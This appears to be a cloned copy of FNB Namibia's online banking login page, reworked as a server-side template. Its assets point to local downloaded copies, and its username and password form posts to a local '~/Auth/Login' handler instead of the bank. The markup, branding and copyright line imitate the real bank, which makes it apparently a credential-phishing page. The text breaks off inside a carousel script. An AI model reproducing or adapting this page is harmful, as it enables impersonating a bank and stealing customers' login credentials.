<!DOCTYPE html>
<!-- saved from url=(0079)https://www.online.fnbnamibia.com.na/banking/navigate?_u=0aWCmttWc&_p=1bn5a5oyb -->
<html style="--unit:100vw/75;">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>FNB</title>


    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="theme-color" content="#ffffff">
    <script>
        function removeLightCss() {
            try {
                document.getElementById("lightModeCss").disabled = true;
                document.getElementById("darkModeCss").disabled = false;
            } catch {

            }
        }
        function removeDarkCss() {
            try {
                document.getElementById("darkModeCss").disabled = true;
                document.getElementById("lightModeCss").disabled = false;
            } catch {

            }
        }

    </script>

    <link href="~/iassets/embeded_fonts.css" rel="stylesheet" type="text/css">
    <link href="~/iassets/high.css" rel="stylesheet" type="text/css">
    <link href="~/iassets/high-mm.css" rel="stylesheet" type="text/css" id="lightModeCss">
    <link href="~/iassets/high-mm-dark.css" rel="stylesheet" type="text/css" id="darkModeCss" disabled="">

    <script>removeDarkCss();</script>
    <link href="~/iassets/ImageCropper.css" rel="stylesheet" type="text/css">
    <link href="~/iassets/awesomplete.css" rel="stylesheet" type="text/css">
    <link href="~/iassets/flatpickr.min.css" rel="stylesheet" type="text/css">

    <link rel="icon" sizes="16x16" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-16.png?ver=2210B177">
    <link rel="icon" sizes="32x32" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-32.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="57x57" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-57.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="60x60" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-60.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="72x72" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-72.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="76x76" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-76.png?ver=2210B177">
    <link rel="icon" sizes="96x96" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-96.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="114x114" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-114.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="120x120" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-120.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="144x144" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-144.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="152x152" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-152.png?ver=2210B177">
    <link rel="apple-touch-icon" sizes="180x180" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-180.png?ver=2210B177">
    <link rel="icon" sizes="192x192" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/icons/Icon-192.png?ver=2210B177">

    <link rel="manifest" href="https://www.online.fnbnamibia.com.na/banking/static/fnb/manifest.json?ver=2210B177" crossorigin="use-credentials">

    <script src="~/iassets/firebase-app.js.download"></script>
    <script src="~/iassets/firebase-messaging.js.download"></script>

    <script src="~/iassets/bankmail.js.download" type="text/javascript"></script>
    <script src="~/iassets/dataPoller.js.download" type="text/javascript"></script>
    <script src="~/iassets/extras.js.download" type="text/javascript"></script>
    <script src="~/iassets/fePoller.js.download" type="text/javascript"></script>
    <script src="~/iassets/form.js.download" type="text/javascript"></script>
    <script src="~/iassets/geoLocate.js.download" type="text/javascript"></script>
    <script src="~/iassets/is.js.download" type="text/javascript"></script>
    <script src="~/iassets/loader.js.download" type="text/javascript"></script>
    <script src="~/iassets/mm.js.download" type="text/javascript"></script>
    <script src="~/iassets/mmPoller.js.download" type="text/javascript"></script>
    <script src="~/iassets/overview.js.download" type="text/javascript"></script>
    <script src="~/iassets/quirks.js.download" type="text/javascript"></script>
    <script src="~/iassets/root.js.download" type="text/javascript"></script>
    <script src="~/iassets/rootPoller.js.download" type="text/javascript"></script>
    <script src="~/iassets/onlinePoller.js.download" type="text/javascript"></script>
    <script src="~/iassets/search.js.download" type="text/javascript"></script>
    <script src="~/iassets/searchOverlay.js.download" type="text/javascript"></script>
    <script src="~/iassets/timers.js.download" type="text/javascript"></script>
    <script src="~/iassets/transfers.js.download" type="text/javascript"></script>
    <script src="~/iassets/transfersHigh.js.download" type="text/javascript"></script>
    <script src="~/iassets/util.js.download" type="text/javascript"></script>
    <script src="~/iassets/voip.js.download" type="text/javascript"></script>
    <script src="~/iassets/voicenotes.js.download" type="text/javascript"></script>
    <script src="~/iassets/lottoPowerball.js.download" type="text/javascript"></script>
    <script src="~/iassets/bib.js.download" type="text/javascript"></script>
    <script src="~/iassets/sharesGraph.js.download" type="text/javascript"></script>

    <script src="~/iassets/FileUploader.js.download" type="text/javascript"></script>
    <script src="~/iassets/ImageCropper.js.download" type="text/javascript"></script>
    <script src="~/iassets/awesomplete.js.download" type="text/javascript"></script>
    <script src="~/iassets/EasyScroller.js.download" type="text/javascript"></script>
    <script src="~/iassets/Animate.js.download" type="text/javascript"></script>
    <script src="~/iassets/Scroller.js.download" type="text/javascript"></script>
    <script src="~/iassets/MarkerClusterer.js.download" type="text/javascript"></script>
    <script src="~/iassets/flatpickr.js.download" type="text/javascript"></script>
    <script src="~/iassets/serviceWorkerController.js.download" type="text/javascript"></script>
    <script src="~/iassets/d3.v3.min.js.download" type="text/javascript"></script>
    <script src="~/iassets/sortable.js.download" type="text/javascript"></script>
    <script src="~/iassets/longpress.js.download" type="text/javascript"></script>
    <script src="~/iassets/bCrypt.js.download" type="text/javascript"></script>
    <script src="~/iassets/forge.js.download" type="text/javascript"></script>
    <script src="~/iassets/securityTools.js.download" type="text/javascript"></script>
    <script src="~/iassets/keystone.bundle.js.download" type="text/javascript"></script>
    <script src="~/iassets/janus.js.download" type="text/javascript"></script>
    <script src="~/iassets/adapter.js.download" type="text/javascript"></script>
    <script>
        Root.screenResizeListener();
    </script>

</head>

<body>

    <script>removeDarkCss();</script>
    <div id="headerFixed" class=" header headerContainerNoBottomLine header-main fixed
	 headerNoSubtitle" style="background-color: defaultCSS;
	 grid-template-columns: calc(8 * var(--unit)) calc( 58  * var(--unit))  auto;">
        <div class="headerTitle headerTitleNoMenu noLeftButton headerTitleNoSubtitle" style="

				 background-color: defaultCSS;
				 color: var(--INK);">
            FNB
        </div>
        <div class="clear"></div>
    </div>

    <style>
        /*True UFF starts at 600*/
        /*Spacing and width according to spec breakdown*/
        @@media (min-width: 600px) and (max-width: 767px) {

            .centreContentBigScreen {
                left: 18.84% !important;
                width: 62.32% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 18.84% !important;
                width: 62.32% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 18.84% !important;
                    width: 62.32% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 20.84% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer .withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 768px) and (max-width: 799px) {

            .centreContentBigScreen {
                left: 25.49% !important;
                width: 49.02% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 25.49% !important;
                width: 49.02% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 25.49% !important;
                    width: 49.02% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 27.49% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 800px) and (max-width: 899px) {

            .centreContentBigScreen {
                left: 20.33% !important;
                width: 59.34% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 20.33% !important;
                width: 59.34% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 20.33% !important;
                    width: 59.34% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 22.33% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 900px) and (max-width: 1023px) {

            .centreContentBigScreen {
                left: 22.28% !important;
                width: 55.44% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 22.28% !important;
                width: 55.44% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 22.28% !important;
                    width: 55.44% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 24.28% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1024px) and (max-width: 1079px) {

            .centreContentBigScreen {
                left: 20.63% !important;
                width: 58.74% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 20.63% !important;
                width: 58.74% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 20.63% !important;
                    width: 58.74% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 22.63% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1080px) and (max-width: 1199px) {

            .centreContentBigScreen {
                left: 22.1% !important;
                width: 55.8% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 22.1% !important;
                width: 55.8% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 22.1% !important;
                    width: 55.8% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 24.1% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1200px) and (max-width: 1279px) {

            .centreContentBigScreen {
                left: 24.975% !important;
                width: 50.05% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 24.975% !important;
                width: 50.05% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 24.975% !important;
                    width: 50.05% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 26.975% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1280px) and (max-width: 1599px) {

            .centreContentBigScreen {
                left: 26.6675% !important;
                width: 46.665% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 26.6675% !important;
                width: 46.665% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 26.6675% !important;
                    width: 46.665% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 28.6675% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1600px) and (max-width: 1919px) {

            .centreContentBigScreen {
                left: 31.4% !important;
                width: 37.2% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 31.4% !important;
                width: 37.2% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 31.4% !important;
                    width: 37.2% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 33.4% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 1920px) and (max-width: 2047px) {

            .centreContentBigScreen {
                left: 32.14% !important;
                width: 35.72% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 32.14% !important;
                width: 35.72% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 32.14% !important;
                    width: 35.72% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 34.14% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 2048px) and (max-width: 2223px) {

            .centreContentBigScreen {
                left: 33.375% !important;
                width: 33.25% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 33.375% !important;
                width: 33.25% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 33.375% !important;
                    width: 33.25% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 35.375% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }

        @@media (min-width: 2224px) {

            .centreContentBigScreen {
                left: 34.98% !important;
                width: 30.04% !important;
            }

            .sortableGridContainer .sortableContainerTray {
                left: 34.98% !important;
                width: 30.04% !important;
            }

                .sortableGridContainer .sortableContainerTray .sortableContainerTrayCancel {
                    left: 34.98% !important;
                    width: 30.04% !important;
                }
            /*Left + 2%*/
            .actionButton {
                right: 36.98% !important;
            }

            .footer {
                width: 0% !important;
            }

            .panelContainer.withNavigationOption {
                margin-left: 0% !important;
            }
        }
    </style>
    <div id="searchOverlay" class="searchOverlayBackdrop centreContentBigScreen" data-key="" data-initialparent="" data-initialtype="" data-remoteparent="" data-remotetype="" data-remotesource="" data-searchcorrectdatatype="">
        <div class="searchOverlay">
            <div class="searchOverlayHeader">
                <a class="searchOverlayHeaderButton" href="javascript:{SearchOverlay.toggle()}">
                    <img src="~/iassets/back.arrow.header.icon.v2.mdpi.png">
                </a>
                <div class="searchOverlayHeaderInputBlock">
                    <input type="text" class="searchOverlayHeaderInput exclude skinSpecificBorderRadiusForInputs" id="searchOverlayInput" placeholder="" data-mincharacters="" data-maxlength="" data-timervalue="" oninput="SearchOverlay.toggleSearchBarIcon(); SearchOverlay.maxLengthCheck(this); SearchOverlay.timerSearchInput(this);" onfocus="SearchOverlay.inputFocus(this.parentElement);" onblur="SearchOverlay.inputBlur(this.parentElement); ">
                </div>

            </div>
            <div class="searchBarInfalte"></div>
            <div class="searchNoResult" id="seachNoResultID">No results found</div>
            <div class="searchFooterInfalte"></div>
        </div>
    </div>
    <div id="content-overlay" class="force-fix"></div>
    <div id="loader" class="force-fix"></div>
    <div id="loader-percentage" class="force-fix"></div>

    <div id="content-overlayClear" class="force-fix"></div>
    <div id="loaderClear" class="force-fix"></div>

    <div id="nativeOverlay" class="nativeFilePickerContainer" style="display: none">
        <div class="nativeFilePickerLoaderBackdrop" style="display: none">
            <div class="nativeFilePickerLoader">
                <div class="nativeFilePickerCenter">X</div>
            </div>
        </div>
        <div class="nativeFilePickerMessageBackdrop">
            <div class="nativeFilePickerMessage">Message</div>
        </div>
    </div>

    <div id="base-content" style="background-color: var(--PAPER); height: 90vh" class="baseBody fixed baseBodyHeaderUFF
	 					centreContentBigScreen baseBodyHeader">

        <form method="post" action="~/Auth/Login" id="formContents1" autocomplete="off" styles="grid-row:1; height: 100%;">

            <input type="hidden" id="PBKey" name="PBKey" data-inputfix="true" value="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0RLHAlv8eSb8GeL/Xd0x
w5ai53FPLYnwdjwIlJAuDDTxwbFmpwQPKmXgsM6ngkDw+CFLDfdtUoIfluoyim54
baqHQmxUmrecCrmBKBas5dIcNqDPapq8JNaHzTVPm9fkE/L3vkwuwcG7B4Rb1jpg
xmN8fS7Yhoo3lDMVysygOB+eoxuvugy8arETX92Ix1WCUJdOCvNn9J6uq6mL4Fnw
Apk6irO8tFyV99kquXd7y4SWPPOsWW/M6tXmdEh+Mi0Bt6Yu0/o5ogTKebdXJz5q
19WbVjECLMIXZZoLbvsrjQeZAKzCK7zmz2Air3rfMHlmf2mcJYlspeJcVfy6ITIb
AQIDAQAB">
            <input type="submit" style="position: absolute; left: -9999px; width: 1px; height: 1px;" tabindex="-1" data-inputfix="true">
            <input type="hidden" name="_csrf" value="" data-inputfix="true">
            <div id="root" class="layeredContainer" style="background-color: var(--GLASS)" data-order="0" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC">
                <div id="root.structuredcontainer.0" class="StructuredContainer animation_NONE_in" style="background-color: var(--GLASS); height: 100%;" data-order="0" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC" data-animation-exit="animation_NONE_out" data-animation-exit-delay="0">
                    <div id="root.structuredcontainer.0.header" class="StructuredContainerHeader" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC" style="background: var(--PAPER); width: 375px;">
                    </div>
                    <div class="StructuredContainerBodyAndBottom" style="background-color: var(--GLASS);">
                        <div class="StructuredContainerHeaderInflate" style="height: calc(0 * var(--unit));"></div>
                        <div id="root.structuredcontainer.0.body" class="StructuredContainerBody" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC">
                            <div id="footer.line" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="1" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <div class="line" style="background-color:  var(--GHOST_MEDIUM);
    height : 1px;">
                                </div>

                            </div>
                            <div id="login.logo" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="2" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in" data-zindex="off">

                                <a>
                                    <div class="image" style="text-align: LEFT;" data-height="" data-scaletype="CENTER_FIT">
                                        <img class="image_img" src="~/iassets/login.logo.icon.mdpi.png" style="visibility: visible; height: 100%;" onload="MM.imageLoad(this)">
                                    </div>
                                </a>
                            </div>
                            <div id="spacer.3" class="animation_NONE_in spacer3 symbol" style="animation-delay: 0;
            height:  calc(3 * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="3" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <div class="Spacer"></div><style type="text/css">
                                                              @@media (min-width: 500px) {
                                                                  .spacer3 {
                                                                      max-height: calc(3 * var(--maxUnitBase)) !important;
                                                                  }
                                                              }
                                </style>
                            </div>
                            <div id="html.view" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="4" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <div class="htmlViewBody" style="background-color: var(--GLASS);">

                                    <center>  <table border="0" width="96%" height="100%">   <tbody><tr>   <td align="center"> <span class="instruction_med_bold">Please enter your FNB Username and Password to Login</span> </td>  </tr>  </tbody></table> </center>
                                </div>
                            </div>
                            <div id="username" class="animation_SCALE_FADE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="5" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <div class="inputGrid">

                                    <style type="text/css">
                                        .inputGrid .inputspecial_username:not([data-error="true"]) {
                                        }

                                        .inputGrid .inputspecial_username:not([data-error="false"]) {
                                            border-color: var(--HIGHLIGHT);
                                            background-color: var(--HIGHLIGHT_5);
                                        }

                                        .inputGrid .inputspecial_username:focus {
                                            border-color: var(--PRIMARY);
                                            background-color: var(--PRIMARY_5);
                                        }

                                            .inputGrid .inputspecial_username:focus .rightIconButton {
                                                border-color: var(--PRIMARY);
                                            }

                                            .inputGrid .inputspecial_username:focus + .inputlabel_username {
                                                color: var(--PRIMARY);
                                            }

                                        .inputGrid .rightIconButton {
                                            border-color: var(--GHOST_DARK);
                                        }

                                        .inputGrid .inputlabel_username:not([data-error="true"]) {
                                            grid-row: 1;
                                            font-size: calc(2.8 * var(--unit));
                                            color: var(--GHOST_MEDIUM);
                                            width: max-content;
                                        }

                                        .inputGrid .inputlabel_username:focus {
                                            grid-row: 1;
                                            font-size: calc(2.8 * var(--unit));
                                            color: var(--PRIMARY);
                                        }

                                        .inputGrid .inputlabel_username:not([data-error="false"]) {
                                            grid-row: 1;
                                            font-size: calc(2.8 * var(--unit));
                                            color: var(--HIGHLIGHT);
                                            width: max-content;
                                        }

                                        /*---------Universal Form Factor-----------*/
                                        @@media (min-width: 500px) {
                                            .inputGrid .inputlabel_username:not([data-error="true"]) {
                                                font-size: calc(2.8 * var(--maxUnitBase)) !important;
                                            }

                                            .inputGrid .inputlabel_username:focus {
                                                font-size: calc(2.8 * var(--maxUnitBase)) !important;
                                            }

                                            .inputGrid .inputlabel_username:not([data-error="false"]) {
                                                font-size: calc(2.8 * var(--maxUnitBase)) !important;
                                            }
                                        }
                                        /*-----------------------------------------*/
                                    </style>

                                    <input required name="email" id="email" class="input inputspecial_username skinSpecificBorderRadiusForInputs" 
                                        style="-webkit-appearance: none;" type="text" placeholder="" value=""
                                        maxlength="30" data-error="false" data-hint="Username" data-key="username"  data-inputfix="true">

                                    <label class="inputlabel_username" data-error="false">Username:</label>
                                    <div class="inputlabelRightAligned">
                                        <label class="inputlabelRight" style="color: var(--GLASS)">Username</label>
                                    </div>
                                </div>
                            </div>
                            <div id="password." class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="6" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <div class="passwordInputGrid">
                                    <div class="hiddenField" id="hiddenValue" style="visibility: hidden">
                                        <input id="id_field" name="a_field" value="" data-inputfix="true">
                                    </div>

                                    <div class="passwordInputWrapper">
                                        <input required id="password" name="password" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" maxlength="40" type="password" data-counter="0" data-wrongvalue="" data-inputvalue="" value=""  class="loginPasswordInputfield skinSpecificBorderRadiusForInputs" data-inputfix="true">

                                    </div>
                                    <span class="passwordLabel" id="labelPass" style="color: var(--GHOST_MEDIUM)">Password:</span>
                                    <label class="inputlabelLeft" style="color: var(--HIGHLIGHT)"></label>
                                    <input id="dataCounter" name="dataCounter" type="hidden" value="0" data-inputfix="true">
                                </div>
                            </div>
                            <div type="submit" id="login1" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="7" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <a onclick="submit();" type="submit" id="pillButtonlogin" data-alternativetextcolour="" data-alternativetext="" data-originaltext="Login" data-originaltextcolour="ALWAYS_PAPER" style="-webkit-touch-callout: none; -webkit-user-select: none; cursor: auto;"
                                         data-type="SUBMIT" data-bindstatus="true">

                                    <div style="background-color: var(--PAPER)" class="pillButtonContainer">
                                        <div type="submit" style="border-color: var(--ELEVATION); border-style: solid;
                    background-color: var(--ALWAYS_ACTION);
                    color: var(--ALWAYS_PAPER);
                    cursor: pointer;" class="pillButton skinSpecificBorderRadiusForPill ">

                                            Login
                                        </div>
                                    </div>
                                </a>
                            </div>
                            <div id="forgot" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="8" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <a id="pillButtonforgot" data-alternativetextcolour="" data-alternativetext="" data-originaltext="Forgot Password" data-originaltextcolour="INK" style="-webkit-touch-callout: none; -webkit-user-select: none; cursor: auto;" 
                                 data-type="SUBMIT" data-bindstatus="true">

                                    <div style="background-color: var(--PAPER)" class="pillButtonContainer">
                                        <div style="
                    background-color: var(--ELEVATION);
                    color: var(--INK);
                    cursor: pointer;" class="pillButton skinSpecificBorderRadiusForPill includeBorder">

                                            Forgot Password
                                        </div>
                                    </div>
                                </a>
                            </div>
                            <div id="register" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="9" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                                <a id="pillButtonregister" 
                                    data-alternativetextcolour="" data-alternativetext="" 
                                    data-originaltext="Register" data-originaltextcolour="INK" 
                                    style="-webkit-touch-callout: none; -webkit-user-select: none; cursor: auto;" 
                                     data-bindstatus="true">

                                    <div style="background-color: var(--PAPER)" class="pillButtonContainer">
                                        <div style="
                    background-color: var(--ELEVATION);
                    color: var(--INK);
                    cursor: pointer;" class="pillButton skinSpecificBorderRadiusForPill includeBorder">

                                            Register
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div id="root.structuredcontainer.0.bottom" class="StructuredContainerBottom" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC">
                        </div>
                        <div class="StructuredContainerFooterInflate" style="height: calc(8.4 * var(--unit));"></div>
                    </div>
                    <div id="root.structuredcontainer.0.footer" class="StructuredContainerFooter" data-source="" data-parent="ui.logon.mm.mobi.password.view" data-ordering="ASC" style="background:
                 var(--PAPER);">
                        <div id="copyright" class="animation_NONE_in  symbol" style="animation-delay: 0;
            height:  calc( * var(--unit));" data-animation-exit="NONE" data-animation-exit-delay="0" data-order="10" data-transform-out="transform_NONE_out" data-transform-in="transform_NONE_in">

                            <div class="text_sub" style="text-align: CENTER;
             color: var(--INK);
             max-height: calc( * var(--line-height-unit-mod));">
                                Copyright © 2022 FirstRand Bank Limited. All rights reserved.
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </form>

    </div>
    <audio id="localAudio"></audio>
    <audio id="remoteAudio"></audio>
    <audio id="ringbacktone" type="audio/mpeg" preload="auto" src="/banking/static/fnb/voipringtones/fnbringbacktone.mp3?ver=2210B177"></audio>
    <audio id="ringtone" type="audio/mpeg" preload="auto" src="/banking/static/fnb/voipringtones/fnbringtone.mp3?ver=2210B177"></audio>
    <script>



        Root.setCssUnitVariable();
        Quirks.init();
        Form.init();
        Root.onImagesLoadedWithCallback(Root.setBodyContentsHeight);


        Timers.clear();

        Voip.init();

        //Added globally for AOP
        var localAudio = document.getElementById("localAudio");
        var remoteAudio = document.getElementById("remoteAudio");
        // if(!remoteAudio.paused){
        // 	Voip.voipOnCallEventTimer = setInterval(Voip.onCallEvent,parseInt(Voip.onCallEventFrequency));
        // 	Timers.register(Voip.voipOnCallEventTimer);
        // }

        serviceWorkerController.pushEnabled();

        serviceWorkerController.serviceWorkerAndPushStart(null, null, null, null, "");

        RootPoller.start();
        OnlinePoller.start();
        RootPoller.options.pollMenu = true;
        RootPoller.options.pollSession = true;
        RootPoller.options.pollUi = false; RootPoller.options.pollSubTitle = true; OnlinePoller.options.pollOnline = false;
        SecurityTools.createPublicPrivateKeyObject();
        Loader.clear();</script>

    <script>
        MM.setMagicMountain();
        AttachEasyScroller(1000);
        MM.init();


        function MessageSymbolSlideLeft(vertical, horizontal, element) {

            if (horizontal >= 0.9) {
                MM.partialUpdate(element);
            }
        }

        //changes index dots. Use pager as an example.
        function IndexDotScroller(vertical, horizontal, element) {

            var dotsContainerParent = document.getElementById(element.parentElement.parentElement.id + "_indexDot");
            if (dotsContainerParent != null) {
                var dotsContainer = dotsContainerParent.querySelector(".pagerRadioPortal");
                var dots = dotsContainer.children;
                var pageIndicator = element.parentElement.querySelector(".counter");
                if (document.getElementById("darkModeCss").disabled == true) {
                    var dotColours = ["0,0,0,1", "0, 0, 0, 0.6", "0, 0, 0, 0.5", "0, 0, 0, 0.4", "0, 0, 0, 0.3", "0, 0, 0, 0.2"];
                } else {
                    var dotColours = ["255,255,255,1", "255, 255, 255, 0.6", "255, 255, 255, 0.5", "255, 255, 255, 0.4", "255, 255, 255, 0.3", "255, 255, 255, 0.2"];
                }

                var sortedDotColours = new Array(6);
                var transformScale = ["scale(1)", "scale(0.9)", "scale(0.8)", "scale(0.7)", "scale(0.6)", "scale(0.5)"];
                var previousStep = dotsContainer.getAttribute("data-previousStep");

                if (dotsContainerParent == null || isNaN(vertical) || isNaN(horizontal)) {
                    return;
                }


                if (isNaN(horizontal)) {
                    horizontal = 0;
                }

                horizontal = Math.round(horizontal);

                if (pageIndicator != null) {

                    pageIndicator.innerText = (horizontal + 1) + "/" + pageIndicator.getAttribute("data-pages");
                }

                var dotPosition = horizontal;

                if (dots != null) {

                    var count = 1;
                    var count2 = 1;

                    for (var beforeDot = dotPosition; beforeDot > 0; beforeDot--) {
                        sortedDotColours[beforeDot - 1] = dotColours[count];

                        if (count < transformScale.length) {
                            dots[beforeDot - 1].style.transform = transformScale[count];
                        }
                        count++;
                    }


                    for (var afterDot = dotPosition; afterDot < dots.length; afterDot++) {
                        sortedDotColours[afterDot + 1] = dotColours[count2];


                        if (afterDot < transformScale.length && afterDot < dots.length - 1) {
                            dots[afterDot + 1].style.transform = transformScale[count2];
                        }
                        count2++;
                    }


                    dots[horizontal].style.transform = transformScale[0];
                    sortedDotColours[dotPosition] = dotColours[0];

                    for (var dot = 0; dot < dots.length; dot++) {

                        dots[dot].style.background = "var(--INK)";

                        if (sortedDotColours[dot] != null) {

                            var index = sortedDotColours[dot];
                            dots[dot].style.background = "rgba(" + index + ")";
                        }
                    }

                    if (horizontal < 6) {

                        dotsContainer.style.transform = "translate(0,0)";
                        dotsContainer.setAttribute("data-previousStep", horizontal);

                    } else {

                        var diff = horizontal - 5;
                        var shift = diff * 15;

                        if (previousStep < horizontal) {

                            if (horizontal < 8) {
                                dotsContainer.style.transform = "translate(-" + shift + "px,0)";
                            } else {
                                dotsContainer.style.transform = "translate(-" + (shift + (5 * ((horizontal + 1) - 8))) + "px,0)";
                            }

                            dotsContainer.setAttribute("data-previousStep", horizontal);
                        } else if (previousStep > horizontal) {


                            if (horizontal < 8) {
                                dotsContainer.style.transform = "translate(-" + (shift) + "px,0)";
                            } else {
                                dotsContainer.style.transform = "translate(-" + (shift + (5 * ((horizontal + 1) - 8)) + 5) + "px,0)";
                            }


